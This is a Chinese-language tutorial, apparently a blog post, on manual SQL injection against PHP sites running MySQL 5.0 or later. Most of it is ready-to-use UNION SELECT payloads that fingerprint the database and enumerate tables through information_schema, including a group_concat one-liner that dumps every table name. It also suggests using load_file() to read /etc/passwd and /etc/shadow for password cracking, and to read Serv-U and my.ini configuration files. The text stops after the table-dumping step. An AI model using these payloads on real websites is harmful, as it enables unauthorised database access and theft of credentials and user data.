php—mysql 5.0以上手工注入实战

目前php注入工具个人感觉不是很好用，自己用pangolin老是出错，所以决定写一篇php手工注入的例子。

手工注入在不同条件下，使用的命令和方法也略为不同，我简单说一下。

首先要做的是在判断好字段数后，**用户信息，注入的过程中如果当前数据库连接用户为root或者具有root权限就可以尝试使用loadfile（）这个函数来读取文件比如在linux下我们可以读取 /etc/passwd 和/etc/shadow来暴力**linux密码
在windows下我们可以读取一些常见的文件以及敏感的地方比如 serv-u的配置文件 my.ini等等，然后就是一一**字段和字段内容即可。

第二种情况通过version（）函数得知mysql版本在5.0以上，那么可以使用mysql自带的information_schema这个数据库来查询所有的表，然后也是一一**字段和字段内容即可。

最不好的情况（目前很少了）就是权限不是root，数据库版本过低，那么所有的表，字段都是要自己猜解的，没有工具的情况下，会让工作量加大几十倍，还不一定能猜到，让人汗颜。

下面我就以实例介绍一下目前主流的mysql 5.0版本以上，用information_schema这个数据库来查询所有的表的方法来手工注入。

1．啊d扫到.注入点

http://xxxx.com/x.php?id=x

2. 判断字段数

http://xxx.com/x.php?id=x order by 4

http://xxx.com/x.php?id=x order by 5

order by 4 返回正确页面，order by 5返回错误页面

说明字段数为4，同时网站关闭了回显功能，无法爆出网站物理路径

3. 查看基本信息，一般要用到的几个函数：
version() 版本 database()当前数据库 user()当前用

http://xxx.com/x.php?id=x%20and%201=2%20union%20select%201,2,3,4

http://xxx.com/x.php?id=x%20and%201=2%20union%20select%201,version(),database(),4

http://xxx.com/x.php?id=x%20and%201=2%20union%20select%201,user(),3,4

所以由此可知：

User（）：[email protected] database（）：a0725135851 version（）：5.1.39-community

（Mysql 版本>=4.0 支持Union 查询 Mysql >=5.0 支持 information_schema 表查询）。

4. 爆表段

http://xxx.com/x.php?id=x+and+1=2+union+select+1,2,table_name,4+from+information_schema.tables+where+table_schema=0x 6130373235313335383531+limit+0,1

爆出来的第一个表是 function

http://xxx.com/x.php?id=x+and+1=2+union+select+1,2,table_name,4+from+information_schema.tables+where+table_schema=0x 6130373235313335383531+limit+1,1

爆出来的第二个表是 member

我们在语句后面添加一个limit0,1 意思是显示第一条数据。如果第一条数据不是管理员表，那么我们就增加一条数据limit1,1，以此类推。

经过测试一共有15个表。

前面的过程相对麻烦下面我介绍一个能直接爆出所有表的简便方法：

http://xxx.com/x.php?id=x+and+1=2+union+select+1,2 ,concat(0x7B317D,group_concat(distinct+table_name),0x7B317D),4+from+information_schema.columns+where+table_schema=0x6130373235313335383531